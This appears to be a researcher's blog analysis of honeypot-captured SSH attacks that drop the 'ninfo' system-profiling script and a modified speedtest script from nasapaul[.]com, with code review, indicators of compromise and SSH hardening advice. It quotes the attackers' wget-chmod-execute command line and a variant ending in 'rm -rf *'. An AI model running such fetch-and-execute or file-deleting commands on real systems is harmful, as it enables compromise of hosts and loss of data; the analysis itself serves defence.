Updated: 2021-02-28 - Update detection section to explain why v.py might not be flagged by AV. Updated: 2021-03-03 - Divide article by LM Kill Chain phases instead of MITRE ATT&CK framework.

Case Summary

I collect live malware samples from honeypots running on public cloud servers. This case examines a repeated security event following a successful bruteforce attack against SSH where malware payloads ninfo and v.py are dropped from nasapaul[.]com. The samples examined in this post were captured on February 23rd, 2021.

Timeline

The security event described in this post was first logged on at 12:22:55 UTC on 2021-02-14. The event has been captured 33 times, with the latest related security event recorded at 16:03:19 UTC on 2021-02-25. If you are interested in viewing the raw logs associated with these repeated events, they can be found in this gist.

Delivery

In order to see any interaction from attackers on the honeypot, they must first brute force SSH. Successfully brute forcing the username admin and password password will allow the attacker to enter commands into an emulated shell. All entered commands return an error reporting the tool is not found (e.g. ls not found). In all instances of this repeated security event the first payload ninfo is seen after the attacker brute forces SSH.

Exploitation & Installation

In 31 of the 33 captured events calling home to nasapaul[.]com the attacker downloads a payload, gives it execution permissions, and then runs the payload.

wget nasapaul[.]com/ninfo ; chmod +x * ; ./ninfo

Defense Evasion

A change in this behavior is observed in two security events on 2021-02-16 where the following commands are entered:

lscpu ; wget nasapaul[.]com/ninfo ; chmod +x * ; ./ninfo ; rm -rf *

Here, the attacker now runs lscpu and after pulling and running ninfo it deletes all local files with rm -rf *. The rm -rf * is used to recursively destroy files ninfo and v.py in the working directory. Subsequent attacks on 2021-02-16 and later returned to the previous command line behavior, with no file removal process.

Collection

The purpose of ninfo is to collect system information. As a reminder, the output of the script is viewed by the attacker via their SSH session. This information can then be scraped, cataloged and/or utilized. The following information is gathered by ninfo:

  • CPU
  • CPU core count
  • CPU stepping (similar to CPU version)
  • CPU bogomips (a crude speed measurement of CPU)
  • GPU type
  • Disk space
  • Uptime
  • OS type
  • OS version
  • OS architecture
  • Root or Privileged Process Access

Code Review

ninfo code review

ninfo script lines 00 - 41

Lines 4 - 19 specify the color used during output. These values are called throughout the script and result in colored formatting of information sent to standard out.

Lines 23 - 37 set variables for requested information. The script uses tools cut, sed, grep, head, and awk in order to manipulate the output of utility commands like lsb_release, free, uname, uptime, lscpi, and df and system files including /proc/cpuinfo and /proc/uptime. Using this technique the attacker is able to neatly print system information to the console in lines 55 - 63.

ninfo script lines 41 - 84

Lines 65 - 71 check to see if the script is running as a privileged process via the EUID or as root via UID. nu ai (not here) is printed if not root. ai (here) is printed if the UID or EUID is 0, indicating the script is running as a privileged process and/or the credentials in use by the attacker is root.

Next, ninfo announces speed testul incepe in 3 secunde (speed test starts in three seconds) then echos out a countdown to standard out. In line 83 it pulls down a second payload from the nasapaul domain named v.py. In line 84 the script attempts to run that payload with perl. The following screenshot shows the output of ninfo if run without network connectivity or simulation:

ninfo color output example

Additional Details

Source IP Origin

The following information was sourced from the Talos Intelligence IP Reputation Lookup. This does not confirm an origin of attack, but rather gives us insight into the last hop on the internet. It is noted all IP addresses are owned by corporations associated with cloud hosting services.

IPNETWORK OWNERLOCATION
52.152.130.178Microsoft CorporationWashington, United States
64.225.101.223Digital OceanFrankfurt am Main, Germany
167.99.253.119Digital OceanFrankfurt am Main, Germany
167.172.24.118Digital OceanClifton, United States
178.62.231.95Digital OceanAmsterdam, Netherlands
188.166.99.239Digital OceanAmsterdam, Netherlands
188.166.124.29Digital OceanAmsterdam, Netherlands

A whois search for these IP addresses identify an organizational link ORG-DOI2-RIPE between some of the attacking IPs:

  • 167.172.24.118/24
  • 178.62.231.95/24
  • 188.166.99.239/24
  • 188.166.124.29/24

DOI2-RIPE org

Language Indicators

An identifying characteristic of this script is that the language used is a mix of English and Romanian. Searchinging for drept de root, versiune, testul incepe in, and secunde via google translator returns a language match for Romanian.

A google search using code from the second payload v.py returns two positive hits:

  1. A malware sample from a github repo of malware collected by honeypots uploaded in DEC 2017.
  2. A speedtest-cli github repository pointing to file speedtest.py from Matt Martz.

To test to see if any files from github user sivel are being used by the attacker I hashed all files from the speedtest-cli github repo and compared these hashes against the hash for v.py. None of the hashes are matches, this means that if the attacker used a file from this repository it has since been modified. The results are shown below:

86aa0f938b6d6a3b2ba54481f1debae2  v.py

051b5371b2a098f10d8271bbfbcd8ee6  CONTRIBUTING.md
3b83ef96387f14655fc854ddc3c6bd57  LICENSE
89ba249b2bf282b2ea9c35e5fd3a197d  MANIFEST.in
8192020c86e390adb168431fdbf260c1  README.rst
0566968464b829958e9bf431eb1db62f  setup.cfg
2a22f34184b9275db470c39026428709  setup.py
6697b8da88cf890de4b057c0151aad2a  speedtest-cli.1
322eb3ec52f028e6b1df6bd0a9f6cb52  speedtest.py
37547186527ed0466ae145073f9012d1  tox.ini
test/scripts/
51b873473209d18958a05c767723836b  source.py

v.py code review

The file v.py is 803 lines long, substantially longer than ninfo. If you would like to examine this file for yourself it can be retrieved from this github repository. Now we can review the code in v.py in order to understand more about its behavior.

Overview in Comments

This attacker put a lot of comments into their code. We see the following statements printed to console:

1. Retrieving NasaPaul.com configuration
2. Retrieving NasaPaul.com server list

The attacker switches to Romanian (the English translation is shown):

3. Host Server is Google Cloud (Paul hides the IPs)
4. Looking for a server
5. Found a server start testing

And then they use English…

6. testing download speed

Then Romanian…

7. Download speed is XYZ Mbit/s

Then English, and then Romanian again.

8. Testing upload speed
9. The flood upload is XYZ Mbit/s

After which point the script ends and the botnet logs out. Note that XYZ in this instance is a substitute for an upload/download speed value.

Main Function

I begin by looking at the main function def main() found on lines 793 - 797. The only defined functions called here are speedtest() and print_().

def main():
    try:
        speedtest()
    except KeyboardInterrupt:
        print_('\nCancelling...')

The speedtest function is defined in the file on lines 553 - 790. We can get a sense of what the script is doing by logically following the calls to subroutines. This means you follow each call to a defined function, like a choose your own adventure book instead of reading the file start to finish. Though, you could totally do that too if you want to get a sense of the functions that might be called or preview to see if anything stylistically looks out of place or different. This code review will highlight some of the code using the comments printed to the console. If you’d like to skip ahead to the next section click here.

Retrieving configuration from nasapaul[.]com

References to nasapaul[.]com are seen within speedtest() on lines 624 and 632.

Calling home to nasapaul[.]com

The excerpt below has been pulled from lines 623 - 624. Line 623 prints Retrieving NasaPaul.com configuration...' to console. This step of the python script executes regardless of internet connectivity.

    if not args.simple:
        print_('\033[1;31m>>>> Retrieving \033[1;37m NasaPaul.com\033[1;m \033[1;31m configuration...')
    try:
        config = getConfig()
    except URLError:
        print_('Cannot retrieve speedtest configuration')
        sys.exit(1)

In case you are wondering why args.simple returns true each execution, note that args is set by the the options parser seen in lines 568 to 604 where --simple becomes args.simple as args is set to an options tuple. options is created from parser.parse_args(). This logic is shared below:

    description = (
        'Command line interface for testing internet bandwidth using '
        'speedtest.net.\n'
        '------------------------------------------------------------'
        '--------------\n'
        'https://github.com/sivel/speedtest-cli')

    parser = ArgParser(description=description)
    # Give optparse.OptionParser an `add_argument` method for
    # compatibility with argparse.ArgumentParser
    try:
        parser.add_argument = parser.add_option
    except AttributeError:
        pass
    parser.add_argument('--bytes', dest='units', action='store_const',
                        const=('byte', 1), default=('bit', 8),
                        help='Display values in bytes instead of bits. Does '
                             'not affect the image generated by --share')
    parser.add_argument('--share', action='store_true',
                        help='Generate and provide a URL to the speedtest.net '
                             'share results image')
    parser.add_argument('--simple', action='store_true',
                        help='Suppress verbose output, only show basic '
                             'information')
    parser.add_argument('--list', action='store_true',
                        help='Display a list of speedtest.net servers '
                             'sorted by distance')
    parser.add_argument('--server', help='Specify a server ID to test against')
    parser.add_argument('--mini', help='URL of the Speedtest Mini server')
    parser.add_argument('--source', help='Source IP address to bind to')
    parser.add_argument('--timeout', default=10, type=int,
                        help='HTTP timeout in seconds. Default 10')
    parser.add_argument('--secure', action='store_true',
                        help='Use HTTPS instead of HTTP when communicating '
                             'with speedtest.net operated servers')
    parser.add_argument('--version', action='store_true',
                        help='Show the version number and exit')

    options = parser.parse_args()
    if isinstance(options, tuple):
        args = options[0]
    else:
        args = options
    del options

Returning to the first block of code, after Retrieving NasaPaul.com configuration...' is printed to console, on line 626 we see a call to getConfig(). This function seen in lines 376 - 414 is shared below:

def getConfig():
    """Download the speedtest.net configuration and return only the data
    we are interested in
    """

    request = build_request('://www.speedtest.net/speedtest-config.php')
    uh, e = catch_request(request)
    if e:
        print_('Could not retrieve speedtest.net configuration: %s' % e)
        sys.exit(1)
    configxml = []
    while 1:
        configxml.append(uh.read(10240))
        if len(configxml[-1]) == 0:
            break
    if int(uh.code) != 200:
        return None
    uh.close()
    try:
        try:
            root = ET.fromstring(''.encode().join(configxml))
            config = {
                'client': root.find('client').attrib,
                'times': root.find('times').attrib,
                'download': root.find('download').attrib,
                'upload': root.find('upload').attrib}
        except AttributeError:  # Python3 branch
            root = DOM.parseString(''.join(configxml))
            config = {
                'client': getAttributesByTagName(root, 'client'),
                'times': getAttributesByTagName(root, 'times'),
                'download': getAttributesByTagName(root, 'download'),
                'upload': getAttributesByTagName(root, 'upload')}
    except SyntaxError:
        print_('Failed to parse speedtest.net configuration')
        sys.exit(1)
    del root
    del configxml
    return config

In the function snippet below pulled from getConfig() above, a request is built using build_request for speedtest.net. build_request “build[s] a urllib2 request object to automatically add a user-agent header to all requests” for a url.

    request = build_request('://www.speedtest.net/speedtest-config.php')
    uh, e = catch_request(request)

Following the creation of request, catch_request is described as “a helper function to catch common exceptions when establishing a connection with a HTTP/S request.” The result of the catch_request(request) and any resulting errors are stored in variables uh and e respectively. If an error is created and stored in variable e the script will gracefully exit:

if e:
        print_('Could not retrieve speedtest.net configuration: %s' % e)
        sys.exit(1)

On lines 386 - 393 of the getConfig() function a variable configxml of type tuple is created. The response from www.speedtest.net/speedtest-config.php in variable uh is appended to configxml. configxml[-1] points to the last value in the tuple configxml. If the length of this value is zero, then the while loop can break. If the value of the response from speednet.com is anything other than 200 OK then None is returned from getConfig().

configxml = []
    while 1:
        configxml.append(uh.read(10240))
        if len(configxml[-1]) == 0:
            break
    if int(uh.code) != 200:
        return None
    uh.close()

While the commented code reads, “retrieving configuration nasapaul[.]com” this behavior was not confirmed in the python script. Only communication to www.speedtest.net/speedtest-config.php was observed.

Retrieving nasapaul Server List

Lines 631 - 644 handle commands related to the Retrieving NasaPaul[.]com server list... comment printed to console:

if not args.simple:
        print_('\033[1;31m>>>> Retrieving \033[1;37m NasaPaul.com\033[1;m \033[1;31m  server list...')
    if args.list or args.server:
        servers = closestServers(config['client'], True)
        if args.list:
            serverList = []
            for server in servers:
                line = ('%(id)4s) %(sponsor)s (%(name)s, %(country)s) '
                        '[%(d)0.2f km]' % server)
                serverList.append(line)
            print_('\n'.join(serverList).encode('utf-8', 'ignore'))
            sys.exit(0)
    else:
        servers = closestServers(config['client'])

We want to look at the closestServers functions to get a better idea of what servers are being used in this block of code. If you want to review these functions briefly check out this gist.

Looking at the closestServers() definition, the urls in use are:

     urls = [
        '://www.speedtest.net/speedtest-servers-static.php',
        '://c.speedtest.net/speedtest-servers-static.php',
        '://www.speedtest.net/speedtest-servers.php',
        '://c.speedtest.net/speedtest-servers.php',
    ]

Similar to what we’ve seen previously in getConfig() we see calls out to the listered urls using build_request and catch_request:

for url in urls:
        try:
            request = build_request(url)
            uh, e = catch_request(request)
            if e:
                errors.append('%s' % e)
                raise SpeedtestCliServerListError
            serversxml = []
            while 1:
                serversxml.append(uh.read(10240))
                if len(serversxml[-1]) == 0:
                    break
            if int(uh.code) != 200:
                uh.close()
                raise SpeedtestCliServerListError
            uh.close()

While the commented code read, retrieving nasapaul[.]com server list this behavior was not confirmed in the python script. Instead calls to speedtest.net are seen.

Host Server is Google Cloud (Paul hides the IPs)

On lines 645 and 648 a print_ statement below prints out Server Hostat De (Hosted Server) and Paul ascunde IPu (Paul hides the IPu).


if not args.simple:
        print_('\033[1;31m>>>> Server Hostat De \033[1;m \033[1;37m%(isp)s\033[1;m (\033[1;37mPaul ascunde IPu\033[1;m)\033[1;37m...' % config['client'])

However, this part of the script will print the ISP in use to console but no such evidence of “hiding IPs” was found in the python script.

Looking for and Finding a Server

Similar to the previous comment the comments, Cautam ce-l mai bun server(We are looking for the best server) and Server Gasit incepem Testele(Server found, tests are started) are printed to console prior to a call to getBestServers().

        if not args.simple:
            print_('\033[1;31m>>>> Cautam ce-l mai bun server \033[1;m')
            print_('\033[1;31m>>>> Server Gasit incepem Testele \033[1;m')
        best = getBestServer(servers)

The function getBestServers() is defined on lines 498 - 534:

def getBestServer(servers):
    """Perform a speedtest.net latency request to determine which
    speedtest.net server has the lowest latency
    """

    results = {}
    for server in servers:
        cum = []
        url = '%s/latency.txt' % os.path.dirname(server['url'])
        urlparts = urlparse(url)
        for i in range(0, 3):
            try:
                if urlparts[0] == 'https':
                    h = HTTPSConnection(urlparts[1])
                else:
                    h = HTTPConnection(urlparts[1])
                headers = {'User-Agent': user_agent}
                start = timeit.default_timer()
                h.request("GET", urlparts[2], headers=headers)
                r = h.getresponse()
                total = (timeit.default_timer() - start)
            except (HTTPError, URLError, socket.error):
                cum.append(3600)
                continue
            text = r.read(9)
            if int(r.status) == 200 and text == 'test=test'.encode():
                cum.append(total)
            else:
                cum.append(3600)
            h.close()
        avg = round((sum(cum) / 6) * 1000, 3)
        results[avg] = server
    fastest = sorted(results.keys())[0]
    best = results[fastest]
    best['latency'] = fastest

    return best

In this function, the passed variable servers has been set in lines 634 or 644 via a call to closestServers() using output created from the configServer() function, discussed in the previous sections. I found no evidence to suggest that any servers related to nasapaul[.]com were queried.

Testing Download and Upload Speeds

Finally, the download and upload speeds are collected using functions downloadspeed() and uploadspeed().

    if not args.simple:
        print_(('\033[1;31m>>>> Server Intretinut de \033[1;37m%(sponsor)s\033[1;m (\033[1;37m%(name)s\033[1;m) \033[1;m[\033[1;37m%(d)0.2f km\033[1;m]\033[1;37m:\033[1;37m '
               '%(latency)s ms\033[1;31m' % best).encode('utf-8', 'ignore'))
    else:
        print_('Ping: %(latency)s ms' % best)

    sizes = [350, 500, 750, 1000, 1500, 2000, 2500, 3000, 3500, 4000]
    urls = []
    for size in sizes:
        for i in range(0, 4):
            urls.append('%s/random%sx%s.jpg' %
                        (os.path.dirname(best['url']), size, size))
    if not args.simple:
        print_('>>>> Testing download speed', end='')
    dlspeed = downloadSpeed(urls, args.simple)
    if not args.simple:
        print_()
    print_('>>>> Download-ul este de  : \033[1;37m%0.2f M%s/s' %
    
           ((dlspeed / 1000 / 1000) * args.units[1], args.units[0]))

    sizesizes = [int(.25 * 1000 * 1000), int(.5 * 1000 * 1000)]
    sizes = []
    for size in sizesizes:
        for i in range(0, 25):
            sizes.append(size)
    if not args.simple:
        print_('\033[1;31m>>>> Testing upload speed', end='')
    ulspeed = uploadSpeed(best['url'], sizes, args.simple)
    if not args.simple:
        print_()
    print_('>>>> Upload-ul de flood este : \033[1;37m%0.2f M%s/s\033[1;31m' %
           ((ulspeed / 1000 / 1000) * args.units[1], args.units[0]))

    if args.share and args.mini:
        print_('Cannot generate a speedtest.net share results image while '
               'testing against a Speedtest Mini server')
    elif args.share:
        dlspeedk = int(round((dlspeed / 1000) * 8, 0))
        ping = int(round(best['latency'], 0))
        ulspeedk = int(round((ulspeed / 1000) * 8, 0))

The uploadspeed() and downloadspeed() functions launch FileGetter and FilePutter threats to calculate upload/download speeds. Nothing in these functions appeared malicious nor did they redirect to a malicious url.

It is noted, however, that the results of the speed test are sent to speedtest[.]net. This code is shown below:

        # Build the request to send results back to speedtest.net
        # We use a list instead of a dict because the API expects parameters
        # in a certain order
        apiData = [
            'download=%s' % dlspeedk,
            'ping=%s' % ping,
            'upload=%s' % ulspeedk,
            'promo=',
            'startmode=%s' % 'pingselect',
            'recommendedserverid=%s' % best['id'],
            'accuracy=%s' % 1,
            'serverid=%s' % best['id'],
            'hash=%s' % md5(('%s-%s-%s-%s' %
                             (ping, ulspeedk, dlspeedk, '297aae72'))
                            .encode()).hexdigest()]

        headers = {'Referer': 'http://c.speedtest.net/flash/speedtest.swf'}
        request = build_request('://www.speedtest.net/api/api.php',
                                data='&'.join(apiData).encode(),
                                headers=headers)
        f, e = catch_request(request)
        if e:
            print_('Could not submit results to speedtest.net: %s' % e)
            sys.exit(1)
        response = f.read()
        code = f.code
        f.close()

In an effort to be clear, I will repeat that speedtest.net is the only domain used in the v.py script aside from the nasapaul[.]com references printed to console using print_(). All network related communication in the v.py script appears limited to speedtest.net.

Impact

Successful execution of ninfo results in losing information about system specification including hardware or virtualized hardware specifications described in the Collection section above. Successful execution of v.py results in information about the system’s bandwidth and level of privilege associated with the compromised login. This information is relayed to the attacker via the SSH session. Typically, these types of collections are stored and re-used either for manipulation by the original attacker or they could be sold on a criminal network for use in a DDoS for hire like a DDoSaaS offering.

All of these attacks originated from successful bruteforce attempts against SSH. There are a few strategies you can use to protect against SSH attacks. You could move the SSH port to a non-default port (e.g. from p22 to p43895). This will subvert some automated attacks, but it is a weak control because the new SSH port can be identified with a simple nmap scan. A more effective way to protect against SSH attacks would be to authenticate using an SSH key or using certificate-based authentication. To pair with this control, you should modify the global ssh configuration file (/etc/ssh/ssh_config) to disable password authentication. You could also use a service like fail2ban to put IPs with repeated failed authentication attempts to SSH on a denylist. For example, if an IP address fails to authenticate 10 times in a row fail2ban would jail the IP, effectively preventing it from being able to login using SSH for a period of time.

Unanswered Questions & Opinions

In my opinion these security events may be the result of a botnet looking for victim hosts to utilize as a part of a DDoS network and/or to be used to serve and collect information about other vulnerable hosts. I have reached this conclusion because the commands seen in the repeated security event are limited to collection information related to computer specifications and bandwidth. Another potential explaination could be that the botnet is searching for victims to mine cryptocurrency. Without further information, these conclusions are purely speculative.

There are a few questions leftover from this case I am still asking myself. Foremost in my mind is seeing a python script run with perl. I could see perl being remapped to a python binary but this behavior was not seen in ninfo. How does that work? Is the #!/usr/bin/env python on line 1 of the file enough for the interpreter to know to use python instead of perl? If I learn anything new related to this event I’ll update and mark the date at the top of this post and/or link to more information.

Detections

When scanned with clamAV no detections are yet seen:

clamscan results with clamav

When I first uploaded ninfo to virustotal on 2021-02-23 it had 1/64 antivirus detections. Since then, the number has increased to 6/64.

ninfo virustotal results

v.py remains at undetected as of 2021-02-27. This is not surprising since the script is a a bandwidth test that reaches out to a known good site, Speedtest by Ookla. Whether the script is malicious or not could be of debate, though, since this specific script v.py used in the context of data collection I would flag the hash.

v.py virustotal results

Network

The following IP addresses were associated with one or more successful SSH brute force attacks.

52.152.130.178 
64.225.101.223
167.99.253.119
167.172.24.118
178.62.231.95
188.166.99.239
188.166.124.29

DNS

The following hostnames were associated with one or more of the security events described in this post.

nasapaul[.]com
wpmudev[.]host

File Hashes

md5sum

678af2ec3251f8692c9324ffe64c198a  ninfo
86aa0f938b6d6a3b2ba54481f1debae2  v.py

sha256sum

19778a62055770a9e5f890e52227ccd39251bf23045c15383411638540ceabf7  ninfo
00e430b733cf199747c9c6e0f2e2fae6a045bbed9c0f0f993112b301fcdf5dbc  v.py

MITRE Tactics